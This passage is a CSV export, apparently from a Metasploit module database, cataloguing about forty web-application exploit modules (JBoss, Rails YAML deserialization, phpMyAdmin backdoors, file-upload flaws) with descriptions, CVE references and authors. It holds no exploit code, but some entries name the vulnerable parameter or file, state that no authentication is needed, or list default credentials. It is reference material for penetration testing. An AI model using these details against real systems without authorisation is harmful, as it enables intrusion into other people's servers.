All versions of AjaXplorer prior to 2.6 are vulnerable.","Metasploit Framework License (BSD)","f","2010-04-04 00:00:00",0,,"aggressive","t","BID-39334, OSVDB-63552","David Maciejak, Julien Cayssol, sinn3r "
117,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/apprain_upload_exec.rb","exploit","multi/http/apprain_upload_exec","exploit/multi/http/apprain_upload_exec","appRain CMF Arbitrary PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in appRain's Content Management Framework (CMF), version 0.1.5 or less. By abusing the uploadify.php file, a malicious user can upload a file to the uploads/ directory without any authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",0,,"aggressive","t","BID-51576, CVE-2012-1153, EDB-18392, OSVDB-78473","EgiX, sinn3r "
118,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/auxilium_upload_exec.rb","exploit","multi/http/auxilium_upload_exec","exploit/multi/http/auxilium_upload_exec","Auxilium RateMyPet Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability found in Auxilium RateMyPet.
The site banner uploading feature can be abused to upload an arbitrary file to the web server, which is accessible in the 'banner' directory, thus allowing remote code execution.","Metasploit Framework License (BSD)","f","2012-09-14 00:00:00",0,,"aggressive","t","EDB-21329, OSVDB-85554","DaOne, sinn3r "
119,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/axis2_deployer.rb","exploit","multi/http/axis2_deployer","exploit/multi/http/axis2_deployer","Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",600,"This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.","Metasploit Framework License (BSD)","f","2010-12-30 00:00:00",0,,"aggressive","t","CVE-2010-0219, URL-http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf, URL-http://www.rapid7.com/security-center/advisories/R7-0037.jsp","Chris John Riley, Joshua Abraham "
120,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/cuteflow_upload_exec.rb","exploit","multi/http/cuteflow_upload_exec","exploit/multi/http/cuteflow_upload_exec","CuteFlow v2.11.2 Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability in CuteFlow version 2.11.2 or prior.
This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the 'upload/___1/' directory and then execute them.","Metasploit Framework License (BSD)","f","2012-07-27 00:00:00",0,,"aggressive","t","OSVDB-84829, URL-http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/","Brendan Coles "
121,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/eaton_nsm_code_exec.rb","exploit","multi/http/eaton_nsm_code_exec","exploit/multi/http/eaton_nsm_code_exec","Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection",600,"This module exploits a vulnerability in lib/dbtools.inc which uses unsanitized user input inside an eval() call. Additionally the base64 encoded user credentials are extracted from the database of the application. Please note that in order to be able to steal credentials, the vulnerable service must have at least one USV module (an entry in the ""nodes"" table in mgedb.db).","Metasploit Framework License (BSD)","t","2012-06-26 00:00:00",0,,"aggressive","t","OSVDB-83199, URL-http://secunia.com/advisories/49103/","h0ng10, sinn3r "
122,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/extplorer_upload_exec.rb","exploit","multi/http/extplorer_upload_exec","exploit/multi/http/extplorer_upload_exec","eXtplorer v2.1 Arbitrary File Upload Vulnerability",600,"This module exploits an authentication bypass vulnerability in eXtplorer versions 2.1.0 to 2.1.2 and 2.1.0RC5 when run as a standalone application. This application has an upload feature that allows an authenticated user with administrator roles to upload arbitrary files to any writable directory in the web root.
This module uses an authentication bypass vulnerability to upload and execute a file.","Metasploit Framework License (BSD)","f","2012-12-31 00:00:00",0,,"aggressive","t","BID-57058, OSVDB-88751, URL-http://extplorer.net/issues/105, URL-http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability","Brendan Coles "
123,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/familycms_less_exec.rb","exploit","multi/http/familycms_less_exec","exploit/multi/http/familycms_less_exec","Family Connections less.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in Family Connections 2.7.1. It's in the dev/less.php script and is due to an insecure use of system(). Authentication isn't required to exploit the vulnerability but register_globals must be set to On.","Metasploit Framework License (BSD)","f","2011-11-29 00:00:00",0,,"aggressive","t","EDB-18198, URL-http://rwx.biz.nf/advisories/fc_cms_rce_adv.html, URL-http://sourceforge.net/apps/trac/fam-connections/ticket/407, URL-https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/","juan vazquez , mr_me "
124,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/freenas_exec_raw.rb","exploit","multi/http/freenas_exec_raw","exploit/multi/http/freenas_exec_raw","FreeNAS exec_raw.php Arbitrary Command Execution",500,"This module exploits an arbitrary command execution flaw in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL to the exec_raw.php page, an attacker may be able to execute arbitrary commands.
NOTE: This module works best with php/meterpreter payloads.","Metasploit Framework License (BSD)","t","2010-11-06 00:00:00",0,,"aggressive","t","URL-http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download","MC "
125,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/gitorious_graph.rb","exploit","multi/http/gitorious_graph","exploit/multi/http/gitorious_graph","Gitorious Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in gitorious. Unvalidated input is passed to the shell allowing command execution.","Metasploit Framework License (BSD)","f","2012-01-19 00:00:00",0,,"aggressive","t","URL-http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce","joernchen "
126,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/glassfish_deployer.rb","exploit","multi/http/glassfish_deployer","exploit/multi/http/glassfish_deployer","Sun/Oracle GlassFish Server Authenticated Code Execution",600,"This module logs in to a GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads and executes commands via deploying a malicious WAR. On GlassFish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.","Metasploit Framework License (BSD)","f","2011-08-04 00:00:00",0,,"aggressive","t","CVE-2011-0807, OSVDB-71948","Joshua Abraham , juan vazquez , sinn3r "
127,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/glossword_upload_exec.rb","exploit","multi/http/glossword_upload_exec","exploit/multi/http/glossword_upload_exec","Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability",600,"This module exploits a file upload vulnerability in Glossword versions 1.8.8 to 1.8.12 when run as a standalone application.
This application has an upload feature that allows an authenticated user with administrator roles to upload arbitrary files to the 'gw_temp/a/' directory.","Metasploit Framework License (BSD)","t","2013-02-05 00:00:00",0,,"aggressive","t","EDB-24456, OSVDB-89960","AkaStep, Brendan Coles "
128,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/horde_href_backdoor.rb","exploit","multi/http/horde_href_backdoor","exploit/multi/http/horde_href_backdoor","Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",600,"This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.","Metasploit Framework License (BSD)","f","2012-02-13 00:00:00",0,,"aggressive","t","CVE-2012-0209, URL-http://dev.horde.org/h/jonah/stories/view.php?channel_id=1&id=155, URL-http://eromang.zataz.com/2012/02/15/cve-2012-0209-horde-backdoor-analysis/","Eric Romang, jduck "
129,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb","exploit","multi/http/hp_sitescope_uploadfileshandler","exploit/multi/http/hp_sitescope_uploadfileshandler","HP SiteScope Remote Code Execution",400,"This module exploits a code execution flaw in HP SiteScope. It chains two vulnerabilities to reach its objective: an authentication bypass in the create operation, available through the APIPreferenceImpl AXIS service, to create a new account with empty credentials, and then the use of the new account to abuse the UploadManagerServlet and upload an arbitrary payload embedded in a JSP.
The module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2 and Linux CentOS 6.3.","Metasploit Framework License (BSD)","t","2012-08-29 00:00:00",0,,"aggressive","t","BID-55269, BID-55273, OSVDB-85121, OSVDB-85151, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-174/, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-175/","juan vazquez , rgod "
130,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_bshdeployer.rb","exploit","multi/http/jboss_bshdeployer","exploit/multi/http/jboss_bshdeployer","JBoss JMX Console Beanshell Deployer WAR Upload and Deployment",600,"This module can be used to install a WAR file payload on JBoss servers that have an exposed ""jmx-console"" application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method.","BSD License","t","2010-04-26 00:00:00",0,,"aggressive","t","CVE-2010-0738, URL-http://www.redteam-pentesting.de/publications/jboss, URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105","Konrads Smelkovs, Patrick Hof, h0ng10, jduck "
131,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_deploymentfilerepository.rb","exploit","multi/http/jboss_deploymentfilerepository","exploit/multi/http/jboss_deploymentfilerepository","JBoss Java Class DeploymentFileRepository WAR Deployment",600,"This module uses the DeploymentFileRepository class in JBoss Application Server (jbossas) to deploy a JSP file which then deploys the WAR file.","Metasploit Framework License (BSD)","f","2010-04-26 00:00:00",0,,"aggressive","t","CVE-2010-0738, URL-http://www.redteam-pentesting.de/publications/jboss, URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105","Jacob Giannantonio, MC , Patrick Hof, h0ng10"
132,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_invoke_deploy.rb","exploit","multi/http/jboss_invoke_deploy","exploit/multi/http/jboss_invoke_deploy","JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",600,"This module can be used to execute a payload on JBoss servers that have the HTTPAdaptor's JMX Invoker exposed on the ""JMXInvokerServlet"". By invoking the methods provided by jboss.admin:DeploymentFileRepository a stager is deployed to finally upload the selected payload to the target. The DeploymentFileRepository methods are only available on JBoss 4.x and 5.x.","Metasploit Framework License (BSD)","t","2007-02-20 00:00:00",0,,"aggressive","t","CVE-2007-1036, OSVDB-33744, URL-http://www.redteam-pentesting.de/publications/jboss","Jens Liebchen, Patrick Hof, h0ng10"
133,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jboss_maindeployer.rb","exploit","multi/http/jboss_maindeployer","exploit/multi/http/jboss_maindeployer","JBoss JMX Console Deployer Upload and Execute",600,"This module can be used to execute a payload on JBoss servers that have an exposed ""jmx-console"" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload.
This method will only work if the target server allows outbound connections to us.","Metasploit Framework License (BSD)","t","2007-02-20 00:00:00",0,,"aggressive","t","CVE-2007-1036, CVE-2010-0738, OSVDB-33744, URL-http://www.redteam-pentesting.de/publications/jboss, URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105","Patrick Hof, h0ng10, jduck "
134,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/jenkins_script_console.rb","exploit","multi/http/jenkins_script_console","exploit/multi/http/jenkins_script_console","Jenkins Script-Console Java Execution",400,"This module uses the Jenkins Groovy script console to execute OS commands using Java.","Metasploit Framework License (BSD)","f","2013-01-18 00:00:00",0,,"aggressive","t","URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console","Spencer McIntyre, jamcut"
135,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/kordil_edms_upload_exec.rb","exploit","multi/http/kordil_edms_upload_exec","exploit/multi/http/kordil_edms_upload_exec","Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the '/kordil_edms/userpictures/' directory.","Metasploit Framework License (BSD)","f","2013-02-22 00:00:00",0,,"aggressive","t","EDB-24547, OSVDB-90645","Brendan Coles "
136,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/lcms_php_exec.rb","exploit","multi/http/lcms_php_exec","exploit/multi/http/lcms_php_exec","LotusCMS 3.0 eval() Remote Command Execution",600,"This module exploits a vulnerability found in Lotus CMS 3.0's Router() function. This is done by embedding PHP code in the 'page' parameter, which will be passed to an eval() call, therefore allowing remote code execution.
The module can either automatically pick up a 'page' parameter from the default page, or manually specify one in the URI option. To use the automatic method, please supply the URI with just a directory path, for example: ""/lcms/"". To manually configure one, you may do: ""/lcms/somepath/index.php?page=index""","Metasploit Framework License (BSD)","f","2011-03-03 00:00:00",0,,"aggressive","t","OSVDB-75095, URL-http://secunia.com/secunia_research/2011-21/","Alligator Security Team, dflah_ , sherl0ck_ , sinn3r "
137,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/log1cms_ajax_create_folder.rb","exploit","multi/http/log1cms_ajax_create_folder","exploit/multi/http/log1cms_ajax_create_folder","Log1 CMS writeInfo() PHP Code Injection",600,"This module exploits the ""Ajax File and Image Manager"" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.","Metasploit Framework License (BSD)","f","2011-04-11 00:00:00",0,,"aggressive","t","CVE-2011-4825, EDB-18075, EDB-18151, OSVDB-76928","Adel SBM, EgiX, sinn3r "
138,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/manageengine_search_sqli.rb","exploit","multi/http/manageengine_search_sqli","exploit/multi/http/manageengine_search_sqli","ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",600,"This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page, which results in remote code execution under the context of SYSTEM in Windows; or as the user in Linux.
Authentication is not required in order to exploit this vulnerability.","Metasploit Framework License (BSD)","f","2012-10-18 00:00:00",0,,"aggressive","t","BID-56138, EDB-22094","egypt , sinn3r , xistence "
139,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/mobilecartly_upload_exec.rb","exploit","multi/http/mobilecartly_upload_exec","exploit/multi/http/mobilecartly_upload_exec","MobileCartly 1.0 Arbitrary File Creation Vulnerability",600,"This module exploits a vulnerability in MobileCartly. The savepage.php file does not do any permission checks before using file_put_contents(), which allows any user to have direct control of that function to create files under the 'pages' directory by default, or anywhere else as long as the user has WRITE permission.","Metasploit Framework License (BSD)","f","2012-08-10 00:00:00",0,,"aggressive","t","BID-55399, EDB-20422","Yakir Wizman , sinn3r "
140,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/movabletype_upgrade_exec.rb","exploit","multi/http/movabletype_upgrade_exec","exploit/multi/http/movabletype_upgrade_exec","Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",300,"This module can be used to execute a payload on Movable Type (MT) that exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. The vulnerability arises due to the following properties: 1. This script may be invoked remotely without requiring authentication to any MT instance. 2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e. functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters. 3.
A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a Perl eval statement, allowing Perl code injection.","Metasploit Framework License (BSD)","f","2013-01-07 00:00:00",0,,"aggressive","t","CVE-2012-6315, CVE-2013-0209, URL-http://www.movabletype.org/2013/01/movable_type_438_patch.html, URL-http://www.sec-1.com/blog/?p=402","Gary O'Leary-Steele, Kacper Nowak, Nick Blundell"
141,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/mutiny_subnetmask_exec.rb","exploit","multi/http/mutiny_subnetmask_exec","exploit/multi/http/mutiny_subnetmask_exec","Mutiny Remote Command Execution",600,"This module exploits an authenticated command injection vulnerability in the Mutiny appliance. Versions prior to 4.5-1.12 are vulnerable. In order to exploit the vulnerability the mutiny user must have access to the admin interface. The injected commands are executed with root privileges. This module has been tested successfully on Mutiny 4.2-1.05.","Metasploit Framework License (BSD)","t","2012-10-22 00:00:00",1,,"passive","t","BID-56165, CVE-2012-3001, OSVDB-86570, URL-http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html, US-CERT-VU-841851","Christopher Campbell, juan vazquez "
142,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/netwin_surgeftp_exec.rb","exploit","multi/http/netwin_surgeftp_exec","exploit/multi/http/netwin_surgeftp_exec","Netwin SurgeFTP Remote Command Execution",400,"This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 or prior.
In order to execute commands via the FTP service, please note that you must have a valid credential to the web-based administrative console.","Metasploit Framework License (BSD)","f","2012-12-06 00:00:00",,,"aggressive","t","EDB-23522","Spencer McIntyre, sinn3r "
143,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/op5_license.rb","exploit","multi/http/op5_license","exploit/multi/http/op5_license","OP5 license.php Remote Command Execution",600,"This module exploits an arbitrary root command execution vulnerability in the OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.","Metasploit Framework License (BSD)","t","2012-01-05 00:00:00",0,,"aggressive","t","CVE-2012-0261, OSVDB-78064, URL-http://secunia.com/advisories/47417/, URL-http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf, URL-http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/","Peter Osterberg "
144,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/op5_welcome.rb","exploit","multi/http/op5_welcome","exploit/multi/http/op5_welcome","OP5 welcome Remote Command Execution",600,"This module exploits an arbitrary root command execution vulnerability in OP5 Monitor welcome.
Ekelow AB has confirmed that OP5 Monitor versions 5.3.5, 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.","Metasploit Framework License (BSD)","t","2012-01-05 00:00:00",0,,"aggressive","t","CVE-2012-0262, OSVDB-78065, URL-http://secunia.com/advisories/47417/, URL-http://www.ekelow.se/file_uploads/Advisories/ekelow-aid-2012-01.pdf, URL-http://www.op5.com/news/support-news/fixed-vulnerabilities-op5-monitor-op5-appliance/","Peter Osterberg "
145,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/openfire_auth_bypass.rb","exploit","multi/http/openfire_auth_bypass","exploit/multi/http/openfire_auth_bypass","Openfire Admin Console Authentication Bypass",600,"This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution, however this might leave the server in an unstable state, making re-exploitation difficult. You might want to do this manually.","Metasploit Framework License (BSD)","t","2008-11-10 00:00:00",0,,"aggressive","t","BID-32189, CVE-2008-6508, EDB-7075, OSVDB-49663, URL-http://community.igniterealtime.org/thread/35874","Andreas Kurtz, h0ng10"
146,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/php_cgi_arg_injection.rb","exploit","multi/http/php_cgi_arg_injection","exploit/multi/http/php_cgi_arg_injection","PHP CGI Argument Injection",600,"When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution.
From the advisory: ""if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the ""encoded in a system-defined manner"" from the RFC) and then passes them to the CGI binary.""","Metasploit Framework License (BSD)","f","2012-05-03 00:00:00",0,,"aggressive","t","CVE-2012-1823, OSVDB-81633, URL-http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/","egypt , hdm , jjarmoc"
147,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/php_volunteer_upload_exec.rb","exploit","multi/http/php_volunteer_upload_exec","exploit/multi/http/php_volunteer_upload_exec","PHP Volunteer Management System v1.0.2 Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability found in PHP Volunteer Management System, version v1.0.2 or prior. This application has an upload feature that allows an authenticated user to upload anything to the 'uploads' directory, which is actually reachable by anyone without a credential. An attacker can easily abuse this upload functionality by first logging in with the default credential (admin:volunteer), uploading a malicious payload, and then executing it by sending another GET request.","Metasploit Framework License (BSD)","f","2012-05-28 00:00:00",0,,"aggressive","t","EDB-18941, OSVDB-82391","Ashoo , sinn3r "
148,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpldapadmin_query_engine.rb","exploit","multi/http/phpldapadmin_query_engine","exploit/multi/http/phpldapadmin_query_engine","phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection",600,"This module exploits a vulnerability in lib/functions.php that allows attacker input to be passed directly to the create_function() php function.
A patch was issued that uses a whitelist regular expression to check the user supplied input before it is passed to the create_function() call.","Metasploit Framework License (BSD)","f","2011-10-24 00:00:00",0,,"aggressive","t","BID-50331, CVE-2011-4075, EDB-18021, OSVDB-76594, URL-http://sourceforge.net/support/tracker.php?aid=3417184","EgiX , TecR0c , mr_me "
149,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb","exploit","multi/http/phpmyadmin_3522_backdoor","exploit/multi/http/phpmyadmin_3522_backdoor","phpMyAdmin 3.5.2.2 server_sync.php Backdoor",300,"This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.","Metasploit Framework License (BSD)","f","2012-09-25 00:00:00",0,,"aggressive","t","URL-http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php","hdm "
150,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpmyadmin_preg_replace.rb","exploit","multi/http/phpmyadmin_preg_replace","exploit/multi/http/phpmyadmin_preg_replace","phpMyAdmin Authenticated Remote Code Execution via preg_replace()",600,"This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php. This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.
PHP versions > 5.4.6 are not vulnerable.","Metasploit Framework License (BSD)","f","2013-04-25 00:00:00",0,,"aggressive","t","CVE-2013-3238, EDB-25003, OSVDB-92793, PMASA-2013-2, URL-http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php, URL-http://www.waraxe.us/advisory-103.html, waraxe-2013-SA#103","Ben Campbell , Janek ""waraxe"" Vind"
151,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phpscheduleit_start_date.rb","exploit","multi/http/phpscheduleit_start_date","exploit/multi/http/phpscheduleit_start_date","phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",600,"This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt software. This vulnerability is only exploitable when the magic_quotes_gpc PHP option is 'off'. Authentication is not required to exploit the bug. Version 1.2.10 and earlier of phpScheduleIt are affected.","BSD License","f","2008-10-01 00:00:00",0,,"aggressive","t","BID-31520, CVE-2008-6132, EDB-6646, OSVDB-48797","EgiX, juan vazquez "
152,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/phptax_exec.rb","exploit","multi/http/phptax_exec","exploit/multi/http/phptax_exec","PhpTax pfilez Parameter Exec Remote Code Injection",600,"This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in an exec() statement, and then results in arbitrary remote code execution under the context of the web server.
Please note: authentication is not required to exploit this vulnerability.","Metasploit Framework License (BSD)","f","2012-10-08 00:00:00",0,,"aggressive","t","EDB-21665, OSVDB-86992","Jean Pascal Pereira , sinn3r "
153,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/plone_popen2.rb","exploit","multi/http/plone_popen2","exploit/multi/http/plone_popen2","Plone and Zope XMLTools Remote Command Execution",600,"Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.","Metasploit Framework License (BSD)","f","2011-10-04 00:00:00",0,,"aggressive","t","CVE-2011-3587, EDB-18262, OSVDB-76105, URL-http://plone.org/products/plone/security/advisories/20110928","Nick Miles, Plone Security team, TecR0c "
154,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/pmwiki_pagelist.rb","exploit","multi/http/pmwiki_pagelist","exploit/multi/http/pmwiki_pagelist","PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit",600,"This module exploits an arbitrary command execution vulnerability in PmWiki from 2.0.0 to 2.2.34.
The vulnerable function is inside /scripts/pagelist.php.","Metasploit Framework License (BSD)","f","2011-11-09 00:00:00",0,,"aggressive","t","BID-50776, CVE-2011-4453, EDB-18149, OSVDB-77261, URL-http://www.pmwiki.org/wiki/PITS/01271","EgiX, TecR0c "
155,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/polarcms_upload_exec.rb","exploit","multi/http/polarcms_upload_exec","exploit/multi/http/polarcms_upload_exec","PolarPearCms PHP File Upload Vulnerability",600,"This module exploits a file upload vulnerability found in PolarPear CMS. By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-01-21 00:00:00",0,,"aggressive","t","CVE-2013-0803","Fady Mohamed Osman"
156,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/qdpm_upload_exec.rb","exploit","multi/http/qdpm_upload_exec","exploit/multi/http/qdpm_upload_exec","qdPM v7 Arbitrary PHP File Upload Vulnerability",600,"This module exploits a vulnerability found in qdPM, a web-based project management application. The user profile's photo upload feature can be abused to upload any arbitrary file onto the victim server machine, which allows remote code execution. Please note that in order to use this module, you must have a valid credential to sign in.","Metasploit Framework License (BSD)","f","2012-06-14 00:00:00",0,,"aggressive","t","EDB-19154, OSVDB-82978","loneferret, sinn3r "
157,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/rails_json_yaml_code_exec.rb","exploit","multi/http/rails_json_yaml_code_exec","exploit/multi/http/rails_json_yaml_code_exec","Ruby on Rails JSON Processor YAML Deserialization Code Execution",600,"This module exploits a remote code execution vulnerability in the JSON request processor of the Ruby on Rails application framework.
This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This vulnerability is very similar to CVE-2013-0156. This module has been tested successfully on RoR 3.0.9, 3.0.19, and 2.3.15. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.","Metasploit Framework License (BSD)","f","2013-01-28 00:00:00",0,,"aggressive","t","CVE-2013-0333","egypt , jjarmoc, lian" 158,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb","exploit","multi/http/rails_xml_yaml_code_exec","exploit/multi/http/rails_xml_yaml_code_exec","Ruby on Rails XML Processor YAML Deserialization Code Execution",600,"This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). 
Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.","Metasploit Framework License (BSD)","f","2013-01-07 00:00:00",0,,"aggressive","t","CVE-2013-0156, URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156","charliesome, espes, hdm , lian" 159,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sflog_upload_exec.rb","exploit","multi/http/sflog_upload_exec","exploit/multi/http/sflog_upload_exec","Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",600,"This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has a default admin credential of ""admin:secret"", which can be abused to access administrative features such as blogs management. Through the management interface, we can upload a backdoor that's accessible by any remote user, and then gain arbitrary code execution.","Metasploit Framework License (BSD)","f","2012-07-06 00:00:00",0,,"aggressive","t","EDB-19626, OSVDB-83767","dun, sinn3r " 160,"2013-05-07 